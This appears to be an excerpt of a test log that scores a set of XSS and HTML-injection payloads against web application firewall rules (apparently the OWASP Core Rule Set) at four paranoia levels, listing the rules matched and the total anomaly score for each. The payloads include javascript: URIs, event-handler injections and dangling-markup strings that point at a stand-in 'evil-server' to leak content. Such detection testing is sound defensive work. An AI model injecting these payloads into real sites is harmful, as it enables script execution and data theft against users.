941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942440 PL2 SQL Comment Sequence Detected.
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 74
******* payload-010-002 ***********
Payload:
payload=<a href="javascript&[0x00]colon[0x00];alert(1)">test</a>
--- Paranoia Level 1 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941100 PL1 XSS Attack Detected via libinjection
Total Incoming Score: 10
--- Paranoia Level 2 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 35
--- Paranoia Level 3 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 48
--- Paranoia Level 4 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 69
******* payload-011-001 ***********
Payload:
payload=<base href="javascript:/a/-alert(1)///////">
--- Paranoia Level 1 ---
941210 PL1 IE XSS Filters - Attack Detected.
941280 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 30
--- Paranoia Level 2 ---
941210 PL1 IE XSS Filters - Attack Detected.
941280 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 50
--- Paranoia Level 3 ---
941210 PL1 IE XSS Filters - Attack Detected.
941280 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 66
--- Paranoia Level 4 ---
941210 PL1 IE XSS Filters - Attack Detected.
941280 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 79
******* payload-016-001 ***********
Payload:
payload=throw onerror=eval,"=alert\x281\x29"
--- Paranoia Level 1 ---
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 10
--- Paranoia Level 2 ---
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942200 PL2 Detects MySQL comment-/space-obfuscated injections and backtick termination
942110 PL2 SQL Injection Attack: Common Injection Testing Detected
Total Incoming Score: 18
--- Paranoia Level 3 ---
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942200 PL2 Detects MySQL comment-/space-obfuscated injections and backtick termination
942110 PL2 SQL Injection Attack: Common Injection Testing Detected
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
Total Incoming Score: 28
--- Paranoia Level 4 ---
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942200 PL2 Detects MySQL comment-/space-obfuscated injections and backtick termination
942110 PL2 SQL Injection Attack: Common Injection Testing Detected
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920460 PL4 Abnormal character escapes in request
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 46
******* payload-020-001 ***********
Payload:
payload=<input type="hidden" accesskey="x" onclick="alert(1)">
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 28
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 44
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 57
******* payload-022-001 ***********
Payload:
payload=<link rel="canonical" accesskey="X" onclick="alert(1)" />
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 28
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 44
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 57
******* payload-024-001 ***********
Payload:
payload=<img src='//evil-server?
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
Total Incoming Score: 5
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 20
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
Total Incoming Score: 33
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 46
******* payload-025-001 ***********
Payload:
payload=<table><tfoot background="//evil-server?
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
Total Incoming Score: 5
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 15
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 31
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 44
******* payload-025-002 ***********
Payload:
payload=<link rel=icon href="//evil-server?
--- Paranoia Level 1 ---
941270 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
Total Incoming Score: 15
--- Paranoia Level 2 ---
941270 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 30
--- Paranoia Level 3 ---
941270 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
Total Incoming Score: 43
--- Paranoia Level 4 ---
941270 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 56
******* payload-025-003 ***********
Payload:
payload=<video><source src="//evil?
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
Total Incoming Score: 5
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
Total Incoming Score: 10
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
932190 Remote Command Execution: Wildcard bypass technique attempt
Total Incoming Score: 28
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
932190 Remote Command Execution: Wildcard bypass technique attempt
Total Incoming Score: 41
******* payload-027-001 ***********
Payload:
payload=<base target="
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
Total Incoming Score: 10
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942110 PL2 SQL Injection Attack: Common Injection Testing Detected
Total Incoming Score: 18
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942110 PL2 SQL Injection Attack: Common Injection Testing Detected
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
Total Incoming Score: 28
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942110 PL2 SQL Injection Attack: Common Injection Testing Detected
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 41
******* payload-028-001 ***********
Payload:
payload=<a href=//evil-server><font size=100 color=red>You must click me</font></a><base target="
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
Total Incoming Score: 10
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942110 PL2 SQL Injection Attack: Common Injection Testing Detected
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 31
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942110 PL2 SQL Injection Attack: Common Injection Testing Detected
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 44
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942110 PL2 SQL Injection Attack: Common Injection Testing Detected
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 57
******* payload-029-001 ***********
Payload:
payload=<base target="_self" />
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
Total Incoming Score: 10
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 15
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
Total Incoming Score: 28
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 41
******* payload-030-001 ***********
Payload:
payload=<input name=x type=hidden form=x value="&lt;a href=//evil-server&gt;&lt;font size=100 color=red&gt;Click me second&lt;/ font&gt;&lt;/a&gt;"><button form=x><font size=100 color=red>Click me first</font></ button><form id=x target="
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
Total Incoming Score: 5
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942110 PL2 SQL Injection Attack: Common Injection Testing Detected
942110 PL2 SQL Injection Attack: Common Injection Testing Detected
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 44
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942110 PL2 SQL Injection Attack: Common Injection Testing Detected
942110 PL2 SQL Injection Attack: Common Injection Testing Detected
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
921180 PL3 HTTP Parameter Pollution (ARGS_NAMES:gt;)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 68
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942110 PL2 SQL Injection Attack: Common Injection Testing Detected
942110 PL2 SQL Injection Attack: Common Injection Testing Detected
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
921180 PL3 HTTP Parameter Pollution (ARGS_NAMES:gt;)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 142
******* payload-031-001 ***********
Payload:
payload=<img src=1 onloadstart=alert(1)>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 25
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 38
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 51
******* payload-031-002 ***********
Payload:
payload=<img src=1 onloadend=alert(1)>
--- Paranoia Level 1 ---
